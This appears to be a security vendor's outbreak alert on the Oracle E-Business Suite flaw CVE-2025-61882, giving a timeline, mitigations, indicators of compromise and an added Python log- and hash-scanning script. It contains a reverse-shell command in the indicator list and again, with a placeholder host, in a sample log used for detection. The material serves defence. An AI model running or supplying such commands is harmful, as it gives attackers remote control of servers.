ICS Labs Outbreak Alert - Oracle EBS Critical Vulnerability (CVE-2025-61882)

  • Writer: Security Team
  • Oct 8

Oracle is warning about a critical vulnerability in Oracle E-Business Suite (EBS), identified as CVE-2025-61882 and rated critical (CVSS 9.8). It specifically affects the Concurrent Processing component integrated with BI Publisher in versions 12.2.3 through 12.2.14. The vulnerability allows remote code execution (RCE) without authentication: an attacker can exploit the system via HTTP requests with minimal technical effort and obtain full control of the affected server.


Active Exploitation and Real Threat:


Recent reports indicate that exploitation began quietly in August but escalated in September, with multiple organizations reporting severe incidents. There is evidence that this vulnerability is being actively exploited by the ransomware group Cl0p, which is well known for data extortion attacks. In corporate environments running internet-exposed Oracle EBS, the risk of compromise is high and can result in data exfiltration, lateral movement, and disruption of critical business processes.


CVE Timeline:


04 October 2025: Disclosure and Critical Rating

  • Oracle Alert: Oracle issues the first security advisory, acknowledging the vulnerability.

  • NVD Publication: The U.S. National Vulnerability Database (NVD) publishes the initial CVE details.

  • Severity Escalation: Within hours, the vulnerability is rated with a CVSS score of 9.8, indicating maximum criticality.


05 October 2025: CVE Registration Formalized

  • CVE Registration: The NVD receives and formalizes the CVE record submitted by Oracle.


06 October 2025: Confirmation of Active Exploitation

  • NCSC Advisory: The United Kingdom’s National Cyber Security Centre (NCSC) issues a formal advisory that the vulnerability is being actively exploited by malicious actors.

  • Inclusion in CISA Catalog: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds CVE-2025-61882 to its “Known Exploited Vulnerabilities Catalog.” This action signals an imminent and confirmed risk to organizations.


Recommendations:


Oracle released an emergency patch this month; however, applying it requires the October 2023 Critical Patch Update to be installed beforehand, which is an obstacle for organizations that do not keep their environments up to date.

Until the patch is applied, it is recommended to restrict access to the system via firewall, implement specific rules in Web Application Firewalls (WAFs), and increase server monitoring. Complete mitigation requires an architectural review, network segmentation, and continuous monitoring to detect potential compromise.

CVE-2025-61882 is more than a technical vulnerability: it is a warning about the risks of neglecting maintenance of critical systems. Rapid response is essential to protect corporate assets and ensure business continuity. Security teams should prioritize investigation of indicators of compromise and reinforce their defense strategies.


IOCs:


IP addresses:

  • 200[.]107[.]207[.]26

  • 185[.]181[.]60[.]11


Command:

  • sh -c /bin/bash -i >& /dev/tcp// 0>&1


SHA-256 file hashes:

  • 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d

  • aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121

  • 6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b

Warning: The IP addresses listed above may still be active. Exercise caution when handling them and do not access them directly to avoid exposure to malicious content.
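As an added example (not the alert's own tooling), the Python script below turns the indicators above into a triage check: it refangs the published IPs, flags access-log lines whose client IP is one of them, flags process records matching the published reverse-shell command, and compares a file's SHA-256 against the listed hashes. The sample log lines are constructed, and the "cmd=" process-record format is an assumption.

```python
import hashlib
import re
# Indicators as published in the alert (IPs defanged, hashes as given).
IOC_IPS_DEFANGED = ["200[.]107[.]207[.]26", "185[.]181[.]60[.]11"]
IOC_SHA256 = {
    "76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d",
    "aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121",
    "6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b",
}
# Published reverse-shell command (interactive bash to /dev/tcp); host/port not matched.
REVERSE_SHELL_RE = re.compile(r"/bin/bash\s+-i\s+>&\s*/dev/tcp/")

def refang(ip: str) -> str:
    """Turn a defanged indicator such as 1[.]2[.]3[.]4 back into a plain IP."""
    return ip.replace("[.]", ".")

IOC_IPS = {refang(ip) for ip in IOC_IPS_DEFANGED}

def scan_access_log(lines):
    """(line_no, client_ip) for each line whose first field is a listed IP.
    Assumes combined-log style lines, where the client IP comes first."""
    hits = []
    for n, line in enumerate(lines, 1):
        client = line.split(" ", 1)[0]
        if client in IOC_IPS:
            hits.append((n, client))
    return hits

def scan_process_log(lines):
    """Line numbers of process records matching the reverse-shell pattern."""
    return [n for n, line in enumerate(lines, 1) if REVERSE_SHELL_RE.search(line)]

def hash_matches(data: bytes) -> bool:
    """True if the SHA-256 of data is one of the published file hashes."""
    return hashlib.sha256(data).hexdigest() in IOC_SHA256

# Constructed sample records (not from a real incident) so the script runs offline.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [06/Oct/2025:10:00:01 +0000] "GET / HTTP/1.1" 200 512',
    '200.107.207.26 - - [06/Oct/2025:10:00:07 +0000] "POST / HTTP/1.1" 200 0',
]
SAMPLE_PROCESS_LOG = [  # assumed "cmd=" audit-record format
    "pid=4120 user=applmgr cmd=/usr/bin/java -jar app.jar",
    "pid=4188 user=applmgr cmd=sh -c /bin/bash -i >& /dev/tcp/203.0.113.9/4444 0>&1",
]

if __name__ == "__main__":
    print("access-log hits:", scan_access_log(SAMPLE_ACCESS_LOG))
    print("process-log hits:", scan_process_log(SAMPLE_PROCESS_LOG))
```

Feed real web-server access logs and process/audit records into the two scan functions, and pass file contents to hash_matches, to get a first pass over the indicators before a deeper investigation.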



CONTACT

ICS Labs

Your best defense strategy

© 2025 ICS - Inorpel CyberSecurity

JOÃO PESSOA

Rua Jose Soares de Medeiros, 1620

Bloco E Módulos 2, 3 e 4, Térreo.

Cabedelo - PB - CEP: 58105-015